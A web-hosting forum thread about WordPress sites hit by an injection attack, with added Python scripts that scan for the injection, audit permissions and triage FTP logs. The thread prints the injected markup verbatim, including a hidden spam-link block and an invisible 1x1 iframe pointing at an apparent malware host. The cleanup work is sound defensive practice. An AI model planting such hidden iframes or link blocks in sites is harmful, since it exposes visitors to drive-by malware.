Wordpress Websites listed as having iframe malware

Customer has multiple domains that appear to be hacked and contain malicious links. Here you can find info on this:

Go here http://www.unmaskparasites.com/security-report/ and then put in domain jamestippins.com and you will see results.

Then the suspicious link shown can be examined via google diagnostics here: http://www.google.com/safebrowsing/diagnostic?site=http://nipkelo.net/?click=5FB6EE

The result of this is the following code, appended at the end of the resulting WordPress HTML code. It is found after the closing html tag. Just go to JamesTippins.com, view source and then go to the bottom of the page and you will see this:

Code:
<!-- c822c1b63853ed273b89687ac505f9fa --><u style="display: none;"><a href="http://www.msn.com/">MSN.com</a>, <a href="http://ozoxul.webhop.net/ingilizce.htm">ingilizce</a>, , , , , , <a href="http://www.msnbc.com/">MSNBC.com</a>, <a href="http://ozoxul.webhop.net/jazdy.htm">jazdy</a>, , , , , , <a href="http://ozoxul.webhop.net/interlaken.htm">interlaken</a>, <a href="http://www.msu.edu/">MSU.edu</a>, , , , , , , <a href="http://ozoxul.webhop.net/wrench.htm">wrench</a>, , , <a href="http://www.mysql.com">MySQL.com</a>, <a href="http://www.nap.edu/">NAP.edu</a>, , , , , , , , <a href="http://ozoxul.webhop.net/ulrich.htm">ulrich</a>, , <a href="http://www.nas.edu/">NAS.edu</a>, , , , , , , , , , , , , <a href="http://www.nationalacademies.org/">NationalAcademies.org</a>, , <a href="http://ozoxul.webhop.net/chavez.htm">chavez</a>, , , , , , , , , <a href="http://www.nature.com/">Nature.com</a>, , , , , , , , , <a href="http://ozoxul.webhop.net/noche.htm">noche</a>, , , <a href="http://www.netscape.com/">Netscape.com</a>, , <a href="http://ozoxul.webhop.net/nikon.htm">nikon</a>, <a href="http://ozoxul.webhop.net/akbar.htm">akbar</a>, , <a href="http://www.newsforge.com/">NewsForge.com</a>, , , , , , <a href="http://ozoxul.webhop.net/voce.htm">voce</a>, , <a href="http://ozoxul.webhop.net/wetter.htm">wetter</a>, <a href="http://www.nytimes.com/">NYTimes.com</a>, , <a href="http://www.nih.gov/">NIH.gov</a>, <a href="http://ozoxul.webhop.net/tree.htm">tree</a>, <a href="http://www.nist.gov/">NIST.gov</a>, , <a href="http://www.noaa.gov/">NOAA.gov</a>, <a href="http://www.nrel.gov/">NREL.gov</a>, <a href="http://ozoxul.webhop.net/astrology.htm">astrology</a>, , , <a href="http://www.oanda.com/">Oanda.com</a>, , , <a href="http://ozoxul.webhop.net/oxfordshire.htm">oxfordshire</a>, </u><!-- c822c1b63853ed273b89687ac505f9fa --><iframe src="http://nipkelo.net/?click=5FB6EE" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
We also found the following files in the cp folder as being infected as well:
cp\scripts\asp\index.html
cp\scripts\perl\index.html
cp\scripts\php\index.html
cp\index.html

I ended up deleting this folder. If this is his control panel then we need a clean one installed here.

But we also need to figure out how he got hacked and how to get it out of wordpress.

He has other domains with the same issue, but let's focus on this one to find a solution.

Greg
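Since the thread's evidence is the markup pasted above (a hidden `<u style="display: none;">` link block, a pair of 32-hex-digit marker comments and a 1x1 iframe styled invisible, all sitting after `</html>`), here is an added scanner that looks for exactly those indicators in HTML and theme files. This is example code written for this page, not something from the thread or from WordPress; the regexes are assumptions derived from the pasted markup, not a vendor signature, and the two sample documents (with placeholder `.invalid` domains) are constructed.

```python
"""Detect the hidden-link block and 1x1 iframe injection described in the
thread. Added example, not code from the thread; the regexes are derived from
the pasted markup and are assumptions, not a vendor signature. The two sample
documents at the bottom are constructed."""
import re
import sys
from pathlib import Path

# <u style="display: none;"> ... </u> container holding the spam links
HIDDEN_U = re.compile(r'<u\s+style="display:\s*none;?"\s*>.*?</u>', re.I | re.S)
# any iframe tag; whether it is hidden is decided in iframe_is_hidden()
IFRAME = re.compile(r'<iframe\b[^>]*>', re.I)
# src attribute of a tag
SRC = re.compile(r'src\s*=\s*["\']?([^"\'\s>]+)', re.I)
# HTML comment wrapping a 32-hex-digit token, used as a marker around the payload
HASH_COMMENT = re.compile(r'<!--\s*[0-9a-f]{32}\s*-->', re.I)
# any non-whitespace content after the closing </html> tag
AFTER_HTML = re.compile(r'</html>\s*\S', re.I)


def iframe_is_hidden(tag: str) -> bool:
    """True when the iframe is 1x1 or styled invisible, as in the injected tag."""
    t = tag.lower()
    tiny = (re.search(r'\bwidth\s*=\s*["\']?1["\']?(?![0-9])', t) and
            re.search(r'\bheight\s*=\s*["\']?1["\']?(?![0-9])', t))
    compact = t.replace(' ', '')
    styled = 'visibility:hidden' in compact or 'display:none' in compact
    return bool(tiny or styled)


def scan_html(text: str) -> dict:
    """Return the indicators found in one document."""
    hidden = [m.group(0) for m in IFRAME.finditer(text) if iframe_is_hidden(m.group(0))]
    sources = [SRC.search(t).group(1) for t in hidden if SRC.search(t)]
    findings = {
        'hidden_link_blocks': len(HIDDEN_U.findall(text)),
        'hidden_iframes': hidden,
        'iframe_sources': sources,
        'marker_comments': HASH_COMMENT.findall(text),
        'trailing_after_html': AFTER_HTML.search(text) is not None,
    }
    findings['suspicious'] = bool(hidden or findings['hidden_link_blocks']
                                  or findings['trailing_after_html'])
    return findings


def scan_tree(root: str, exts=('.html', '.htm', '.php')) -> dict:
    """Scan every HTML/PHP file under root (theme index.php/footer.php included)."""
    hits = {}
    for path in Path(root).rglob('*'):
        if path.is_file() and path.suffix.lower() in exts:
            try:
                text = path.read_text(errors='replace')
            except OSError:
                continue
            f = scan_html(text)
            if f['suspicious']:
                hits[str(path)] = f
    return hits


# Constructed samples: one carrying the injection pattern, one with a legitimate
# visible embed that must not be flagged. Domains are placeholders.
SAMPLE_INFECTED = (
    '<html><body><p>hello</p></body></html>\n'
    '<!-- 0123456789abcdef0123456789abcdef --><u style="display: none;">'
    '<a href="http://spam.example.invalid/a.htm">a</a>, , , </u>'
    '<!-- 0123456789abcdef0123456789abcdef -->'
    '<iframe src="http://dropper.example.invalid/?click=XYZ" width=1 height=1 '
    'style="visibility:hidden;position:absolute"></iframe>'
)
SAMPLE_CLEAN = ('<html><body><iframe src="https://video.example/embed/1" '
                'width="560" height="315"></iframe></body></html>\n')

if __name__ == '__main__':
    if len(sys.argv) > 1:
        for path, f in scan_tree(sys.argv[1]).items():
            print(path, f['iframe_sources'], f['marker_comments'])
    else:
        print('infected:', scan_html(SAMPLE_INFECTED))
        print('clean:', scan_html(SAMPLE_CLEAN))
```

Run it with a path argument to walk a site's document root (it picks up the theme `index.php`/`footer.php` files as well as static HTML); the `iframe_sources` list is what you would feed to a reputation lookup such as the Google diagnostic page mentioned above.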
 
Ok... here is an update.

I found the injected code in the wp-content/themes/themename/index.php and some of the footer.php files.

And this looks to be in every single domain. As well as the cp folder directories listed earlier.

I think deleting the CP folder (and root index.html) completely for all domains and having them replaced is needed... and then it looks like we need to clear the offending code out of all the wordpress themes.

I have also asked the customer to upgrade all sites to the latest wordpress to plug up any security holes... to change the ftp password... and make sure the files with the injected code are cleaned.

So now how is this particular hack happening... security hole in web app or a server hack?
 
This is targeting many web apps, seen several mambo and joomla sites hit the last days, looks to be using 777 permissions in most cases.
 
I was looking at the one domain and he didn't have anything set with 777.

Most folders are 755.
Most files are 644 or 744.

Of course that is generalized findings... but I don't see anything with 777.

I do see something strange. The owner of the folders and files says 540 and I don't know what that is... I would have thought it would have been his user name. Well... in the ftp client it says 540 for the owner... but in the control panel file manager it does show username:username so maybe that is a non issue.
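To make the permission check above repeatable across the customer's other domains, here is an added audit script (not from the thread) that walks a web root and reports anything off the baseline Greg describes: 755 directories, 644/744 files, no world-writable entries, no setuid/setgid bits. It also resolves each owner's uid to a name, falling back to the bare number, which is what an FTP listing shows when the server cannot map the id to a user. The baseline sets are assumptions taken from the numbers in the post.

```python
"""Walk a web root and report entries that deviate from the baseline Greg
describes (755 directories, 644/744 files), plus setuid/setgid bits and
owners that only resolve to a number. Added example, not from the thread;
the baseline sets are assumptions taken from the thread's numbers."""
import os
import stat
import sys

EXPECTED_DIR = {0o755}          # directories Greg observed
EXPECTED_FILE = {0o644, 0o744}  # files Greg observed


def mode_findings(mode: int, is_dir: bool) -> list:
    """Issue labels for a raw st_mode value; an empty list means on-baseline."""
    perm = stat.S_IMODE(mode)
    issues = []
    if perm & stat.S_IWOTH:
        issues.append('world-writable')
    elif perm & stat.S_IWGRP:
        issues.append('group-writable')
    if perm & stat.S_ISUID:
        issues.append('setuid')
    if perm & stat.S_ISGID:
        issues.append('setgid')
    if perm not in (EXPECTED_DIR if is_dir else EXPECTED_FILE):
        issues.append('nonstandard %o' % perm)
    return issues


def owner_name(uid: int) -> str:
    """uid to user name; falls back to the bare number, which is what an FTP
    listing shows when the server cannot map the id to a name."""
    try:
        import pwd  # POSIX only
        return pwd.getpwuid(uid).pw_name
    except (ImportError, KeyError, OverflowError):
        return str(uid)


def audit_tree(root: str) -> list:
    """Return (path, owner, issues) for every entry that has at least one issue."""
    report = []
    for dirpath, dirnames, filenames in os.walk(root):
        entries = [(d, True) for d in dirnames] + [(f, False) for f in filenames]
        for name, is_dir in entries:
            full = os.path.join(dirpath, name)
            try:
                st = os.lstat(full)
            except OSError:
                continue
            if stat.S_ISLNK(st.st_mode):
                continue  # symlink modes are not meaningful
            issues = mode_findings(st.st_mode, is_dir)
            if issues:
                report.append((full, owner_name(st.st_uid), issues))
    return report


if __name__ == '__main__':
    root = sys.argv[1] if len(sys.argv) > 1 else '.'
    for path, owner, issues in audit_tree(root):
        print('%-60s %-12s %s' % (path, owner, ', '.join(issues)))
```

Run it against the document root of each domain; an empty report means everything matches the baseline, and a `world-writable` line is the 777 case the earlier reply describes.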
 
We've seen an increasing number of these done via FTP and actually posted about the vulnerability in Flash and Adobe Reader. This MAY be part of it; of course, it's hard to know, when someone just logs in via FTP without problem and changes files without any login issues, that it is not legit.
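The reply above makes the point that a stolen FTP credential produces clean logins, so the log evidence is not a failed authentication but a successful session from an unexpected address that writes to web files. Here is an added triage script (not from the thread) that parses vsftpd-style FTP log lines and lists uploads of `.php`/`.html`/`.js` files by client IPs outside a known-good list. The log lines are constructed, the line layout follows vsftpd's default log format as an assumption, and the allowlist is hypothetical.

```python
"""Triage vsftpd-style FTP logs for sessions that uploaded web files from IPs
not on a known-good list. Added example, not from the thread; the log lines
are constructed, the line layout follows vsftpd's default log format as an
assumption, and the known-IP allowlist is hypothetical."""
import re
from collections import Counter, defaultdict

LINE = re.compile(
    r'^(?P<ts>\w{3} \w{3} +\d{1,2} \d\d:\d\d:\d\d \d{4}) \[pid \d+\] \[(?P<user>[^\]]+)\] '
    r'(?P<status>OK|FAIL) (?P<action>[A-Z]+): Client "(?P<ip>[^"]+)"'
    r'(?:, "(?P<path>[^"]+)")?'
)
# file types whose modification matters for this kind of injection
WEB_FILE = re.compile(r'\.(php|html?|js)$', re.I)


def parse_ftp_log(lines):
    """Parse each line into a dict; unparseable lines are skipped."""
    events = []
    for line in lines:
        m = LINE.match(line)
        if m:
            events.append(m.groupdict())
    return events


def login_counts(events, ok=True) -> dict:
    """Count successful (ok=True) or failed logins per client IP."""
    status = 'OK' if ok else 'FAIL'
    return dict(Counter(e['ip'] for e in events
                        if e['action'] == 'LOGIN' and e['status'] == status))


def suspicious_uploads(events, known_ips) -> dict:
    """Uploads of web files by clients outside the allowlist, keyed by IP."""
    hits = defaultdict(list)
    for e in events:
        if (e['action'] == 'UPLOAD' and e['status'] == 'OK'
                and e['ip'] not in known_ips
                and e['path'] and WEB_FILE.search(e['path'])):
            hits[e['ip']].append(e['path'])
    return dict(hits)


# Constructed log: the customer's usual address uploads an image; a second
# address fails once, then logs in cleanly and overwrites a theme footer and
# the cp index page.
SAMPLE_LOG = """\
Mon Mar 02 09:15:01 2009 [pid 4121] [jtsite] OK LOGIN: Client "198.51.100.7"
Mon Mar 02 09:16:40 2009 [pid 4121] [jtsite] OK UPLOAD: Client "198.51.100.7", "/public_html/wp-content/uploads/photo.jpg", 204800 bytes, 150.00Kbyte/sec
Tue Mar 03 03:40:58 2009 [pid 5899] [jtsite] FAIL LOGIN: Client "203.0.113.55"
Tue Mar 03 03:41:12 2009 [pid 5902] [jtsite] OK LOGIN: Client "203.0.113.55"
Tue Mar 03 03:41:19 2009 [pid 5902] [jtsite] OK UPLOAD: Client "203.0.113.55", "/public_html/wp-content/themes/themename/footer.php", 3120 bytes, 30.00Kbyte/sec
Tue Mar 03 03:41:22 2009 [pid 5902] [jtsite] OK UPLOAD: Client "203.0.113.55", "/public_html/cp/index.html", 2900 bytes, 28.00Kbyte/sec
"""
KNOWN_IPS = {'198.51.100.7'}  # hypothetical: the customer's usual address

if __name__ == '__main__':
    ev = parse_ftp_log(SAMPLE_LOG.splitlines())
    print('ok logins:', login_counts(ev))
    print('failed logins:', login_counts(ev, ok=False))
    for ip, paths in suspicious_uploads(ev, KNOWN_IPS).items():
        print(ip, '->', paths)
```

The known-IP set is the part that needs real data: populate it from the customer's own addresses, then any IP that appears under `suspicious_uploads` is a session to treat as the credential theft the reply describes, with the listed paths as the files to restore. Changing the FTP password, as Greg already asked the customer to do, is what invalidates the stolen credential.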
 